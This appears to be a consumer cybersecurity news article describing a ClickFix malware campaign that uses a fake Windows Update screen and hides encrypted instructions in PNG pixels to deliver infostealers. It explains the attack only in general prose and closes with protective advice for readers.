 |
| A fake Windows Security Update screen pictured |
You’re browsing the web when suddenly a Windows update screen takes over your entire monitor. A progress bar is 95% complete, insisting on a "critical security update." Your heart skips a beat—you don't want to interrupt an important system patch. But what if the update itself is the threat?
Cybersecurity researchers have uncovered a sinister new variant of the infamous "ClickFix" malware that is doing exactly that. This sophisticated attack doesn't just mimic a Windows update; it uses an incredibly clever method of hiding malicious code within the pixels of an innocent-looking PNG image to deploy powerful information-stealers.
The discovery, recently detailed by Huntress cybersecurity researchers, reveals a multi-stage attack designed to trick even cautious users into handing over the keys to their digital kingdom.
The Deception: A Full-Screen Fake-Out
The attack begins on the seedy underbelly of the internet, primarily on fake adult websites that mimic popular, legitimate ones. Users are often lured in by malicious ads or fake video players, or are met with a prompt for "age verification."
Once clicked, the trap is sprung. The browser window goes full-screen, displaying a flawless replica of a Microsoft Windows update screen, complete with a progress bar frozen at 95%. The illusion is so convincing that many users believe their system is genuinely updating.
This is where the "social engineering"—the art of human hacking—truly begins. The fake screen instructs the user to press the Windows key + R to open the Run dialog box. A malicious command is already pre-copied to the clipboard, and the user is told to paste it directly. By following these instructions, the user willingly delegates administrative access to the cybercriminals, bypassing many initial security barriers.
The Technical Trickery: Malicious Code Buried in an Image
Once the user pastes and executes the command, a complex and stealthy chain of events is set in motion.
The command runs mshta (Microsoft HTML Application Host), a legitimate Windows tool, to contact a malicious server. From there, a payload is fetched, and the malware immediately runs junk PowerShell code. This obfuscation technique is designed to create noise, confusing security tools like Bitdefender and preventing them from detecting the true malicious activity.
Then comes the masterstroke. The malware deploys a .NET assembly that decrypts a PNG image file. To any normal system or person, this image looks completely harmless. However, the malware is programmed to read the pixel data of the image, where the attackers have hidden encrypted shell instructions.
As the Huntress team explains in their detailed analysis, this technique of hiding code in image pixels is a sophisticated form of steganography, making the malicious payload nearly invisible to traditional detection methods. You can read their full technical breakdown here: Huntress researchers expose the new ClickFix malware variant buried inside images.
After extracting and decrypting the instructions from the PNG, the malware injects them into processes already running on the victim's computer. This final step deploys potent information-stealing malware like Rhadamanthys or LummaC2.
The Payoff: Your Data, Stolen
These "infostealers" are the final payload and the ultimate goal of the entire operation. They silently scrape everything of value from the infected system:
- Usernames and Passwords (from browsers and stored credentials)
- Browser History and Cookies
- Cryptocurrency Wallets and their keys
- Bank Account Details
- Personal Files and Documents
All this harvested data is then bundled up and sent to servers controlled by the attackers, often located overseas, leading to identity theft, financial loss, and further targeted attacks.
A Persistent and Evolving Threat
Huntress states that this specific ClickFix variant has been circulating since early October 2023, with numerous websites still actively hosting the fake update prompt. The attackers continuously refine their approach, deploying the malware with varying levels of sophistication across different sites.
The researchers even found bizarre elements within the code, such as a cryptic quote from an old UN meeting: “With regard to stage III, we highly recommend the complete destruction of all weapons, as lasting peace cannot be ensured otherwise.” This appears to be another layer of obfuscation or a bizarre calling card, intended to distract and confuse analysts.
How to Protect Yourself
This new ClickFix campaign is a stark reminder that cybercriminals are relying less on technical exploits and more on exploiting human psychology.
To stay safe:
- Be Skeptical of Unsolicited Updates: Microsoft Windows updates never require you to paste commands into the Run window. If you see such a prompt, it is 100% malware.
- Check the URL: Be mindful of the websites you visit. If you land on a suspicious or unfamiliar domain, close the tab immediately.
- Avoid Clicking Ads on Shady Sites: Malvertising is a primary infection vector. Avoid interacting with ads on untrustworthy websites.
- Never Run Unknown Commands: Under no circumstances should you paste and run a command you don't understand, especially one that was "pre-copied" for you.
- Use a Reputable Security Suite: A good antivirus/anti-malware solution can still provide a critical safety net, even against sophisticated threats.
The ClickFix Windows Update scam is, by far, one of the most ingenious and sinister forms of infostealing seen to date. By staying vigilant and questioning unexpected prompts, you can ensure you don't become its next victim.